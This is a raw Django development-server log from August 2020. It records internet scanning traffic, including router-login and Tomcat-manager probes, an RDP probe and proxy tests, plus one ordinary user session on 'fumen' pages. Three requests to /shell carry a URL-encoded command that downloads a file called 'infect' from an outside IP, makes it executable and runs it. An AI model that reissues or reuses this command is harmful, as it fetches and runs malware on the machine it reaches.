  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /boaform/admin/formLogin
[23/Aug/2020 21:55:36] "POST /boaform/admin/formLogin HTTP/1.1" 404 3010
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[23/Aug/2020 22:53:27] "GET /manager/html HTTP/1.1" 400 63284
Not Found: /boaform/admin/formLogin
[23/Aug/2020 23:41:47] "POST /boaform/admin/formLogin HTTP/1.1" 404 3010
Not Found: /
[23/Aug/2020 23:42:42] "GET / HTTP/1.1" 404 2922
[24/Aug/2020 00:04:29] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[24/Aug/2020 00:04:29] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /shell
[24/Aug/2020 00:34:45] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F185.172.110.199%2Finfect%3Bchmod%20777%20infect%3B.%2Finfect HTTP/1.1" 404 3050
Not Found: /boaform/admin/formLogin
[24/Aug/2020 00:58:28] "POST /boaform/admin/formLogin HTTP/1.1" 404 3010
Not Found: /
[24/Aug/2020 01:30:40] "GET / HTTP/1.1" 404 2922
Not Found: /
[24/Aug/2020 02:02:02] "GET / HTTP/1.1" 404 2922
Not Found: /
[24/Aug/2020 02:37:01] "GET / HTTP/1.1" 404 2922
----------------------------------------
Exception happened during processing of request from ('84.193.201.197', 48109)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[24/Aug/2020 02:53:41] "GET / HTTP/1.1" 404 2922
----------------------------------------
Exception happened during processing of request from ('84.193.201.197', 50677)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[24/Aug/2020 03:28:18] "GET / HTTP/1.1" 404 2922
Not Found: /
[24/Aug/2020 04:35:07] "GET / HTTP/1.0" 404 2930
Not Found: /http:/175.24.50.211:8080/home/
[24/Aug/2020 05:11:48] "GET http://175.24.50.211:8080/home/ HTTP/1.1" 404 1708
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 35101)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[24/Aug/2020 05:26:01] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1742
----------------------------------------
Exception happened during processing of request from ('80.82.70.187', 53842)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[24/Aug/2020 05:26:02] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1742
----------------------------------------
Exception happened during processing of request from ('80.82.70.187', 54387)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/fumen/fumen_detail/
[24/Aug/2020 05:28:22] "GET http://175.24.50.211:8080/fumen/fumen_detail/?fumen_id%3D500100748 HTTP/1.1" 404 1771
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 41481)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[24/Aug/2020 05:57:01] "GET / HTTP/1.0" 404 2930
Not Found: /
[24/Aug/2020 06:48:09] "GET / HTTP/1.1" 404 2922
----------------------------------------
Exception happened during processing of request from ('117.24.12.223', 33291)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /boaform/admin/formLogin
[24/Aug/2020 07:19:19] "POST /boaform/admin/formLogin HTTP/1.1" 404 3010
Not Found: /
[24/Aug/2020 07:29:56] "GET / HTTP/1.1" 404 2922
Not Found: /
[24/Aug/2020 07:30:00] "GET / HTTP/1.1" 404 2922
----------------------------------------
Exception happened during processing of request from ('117.24.12.223', 4314)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('117.24.12.223', 4640)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/clientapi.ipip.net/echo.php
[24/Aug/2020 09:02:59] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1733
[24/Aug/2020 09:58:04] "GET /login/ HTTP/1.1" 200 4662
[24/Aug/2020 09:58:04] "GET /static/css/login.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:04] "GET /captchaimage/df3d8c58dacc4cb73211e8c1e5b413221d553bda/ HTTP/1.1" 200 3912
[24/Aug/2020 09:58:04] "GET /static/bootstrap-4.5.2-dist/js/bootstrap.min.js HTTP/1.1" 200 60044
[24/Aug/2020 09:58:04] "GET /static/bootstrap-4.5.2-dist/css/bootstrap.min.css HTTP/1.1" 200 160302
[24/Aug/2020 09:58:04] "GET /static/js/jquery-3.2.1.js HTTP/1.1" 200 268039
Not Found: /favicon.ico
[24/Aug/2020 09:58:05] "GET /favicon.ico HTTP/1.1" 404 2973
[24/Aug/2020 09:58:06] "GET /home HTTP/1.1" 301 0
[24/Aug/2020 09:58:06] "GET /home/ HTTP/1.1" 200 3104
[24/Aug/2020 09:58:06] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:26] "GET /login/ HTTP/1.1" 200 4662
[24/Aug/2020 09:58:26] "GET /static/css/login.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:26] "GET /captchaimage/d54e00352afb492fbe8524750f9cad2aa9006da7/ HTTP/1.1" 200 4769
[24/Aug/2020 09:58:33] "POST /login/ HTTP/1.1" 302 0
[24/Aug/2020 09:58:33] "GET /home HTTP/1.1" 301 0
[24/Aug/2020 09:58:33] "GET /home/ HTTP/1.1" 200 3257
[24/Aug/2020 09:58:33] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:34] "GET /fumen HTTP/1.1" 301 0
[24/Aug/2020 09:58:34] "GET /fumen/ HTTP/1.1" 200 49623
[24/Aug/2020 09:58:35] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:38] "GET /fumen/fumen_detail?fumen_id=500100747 HTTP/1.1" 301 0
[24/Aug/2020 09:58:38] "GET /fumen/fumen_detail/?fumen_id=500100747 HTTP/1.1" 200 6579
[24/Aug/2020 09:58:38] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:43] "GET /fumen/own_fumen HTTP/1.1" 301 0
[24/Aug/2020 09:58:43] "GET /fumen/own_fumen/ HTTP/1.1" 200 7638
[24/Aug/2020 09:58:43] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:47] "GET /fumen/ HTTP/1.1" 200 49623
[24/Aug/2020 09:58:47] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:50] "GET /fumen/fumen_detail?fumen_id=500100744 HTTP/1.1" 301 0
[24/Aug/2020 09:58:50] "GET /fumen/fumen_detail/?fumen_id=500100744 HTTP/1.1" 200 6059
[24/Aug/2020 09:58:50] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:58:52] "GET /fumen/fumen_detail?fumen_id=500100748 HTTP/1.1" 301 0
[24/Aug/2020 09:58:52] "GET /fumen/fumen_detail/?fumen_id=500100748 HTTP/1.1" 200 10852
[24/Aug/2020 09:58:52] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:00] "GET /fumen/own_fumen/ HTTP/1.1" 200 7638
[24/Aug/2020 09:59:00] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:02] "GET /fumen/ HTTP/1.1" 200 49623
[24/Aug/2020 09:59:02] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:04] "GET /fumen/ HTTP/1.1" 200 49623
[24/Aug/2020 09:59:04] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:04] "GET /home/ HTTP/1.1" 200 3257
[24/Aug/2020 09:59:04] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:06] "GET /fumen/ HTTP/1.1" 200 49623
[24/Aug/2020 09:59:06] "GET /static/css/fumen.css HTTP/1.1" 404 1669
[24/Aug/2020 09:59:06] "GET /fumen/own_fumen/ HTTP/1.1" 200 7638
[24/Aug/2020 09:59:06] "GET /static/css/fumen.css HTTP/1.1" 404 1669
Not Found: /
[24/Aug/2020 10:19:46] "GET / HTTP/1.1" 404 2917
Not Found: /favicon.ico
[24/Aug/2020 10:20:46] "GET /favicon.ico HTTP/1.1" 404 2973
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[24/Aug/2020 10:26:29] "GET /manager/html HTTP/1.1" 400 63284
Not Found: /shell
[24/Aug/2020 11:09:12] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F185.172.110.199%2Finfect%3Bchmod%20777%20infect%3B.%2Finfect HTTP/1.1" 404 3050
Not Found: /
[24/Aug/2020 12:02:44] "GET / HTTP/1.1" 404 2922
[24/Aug/2020 12:40:08] code 400, message Bad request version ('V¿\x99Ç')
[24/Aug/2020 12:40:08] "»©Ú@õÕÆóm²ÎD¿µö¼¤åbÏÇ®öw¨ÁssOG¹V¿Ç" 400 -
Not Found: /
[24/Aug/2020 12:41:44] "GET / HTTP/1.1" 404 2922
Not Found: /
[24/Aug/2020 13:04:52] "GET / HTTP/1.1" 404 2922
Not Found: /favicon.ico
[24/Aug/2020 13:22:44] "GET /favicon.ico HTTP/1.1" 404 2973
Not Found: /shell
[24/Aug/2020 13:26:03] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F185.172.110.199%2Finfect%3Bchmod%20777%20infect%3B.%2Finfect HTTP/1.1" 404 3050
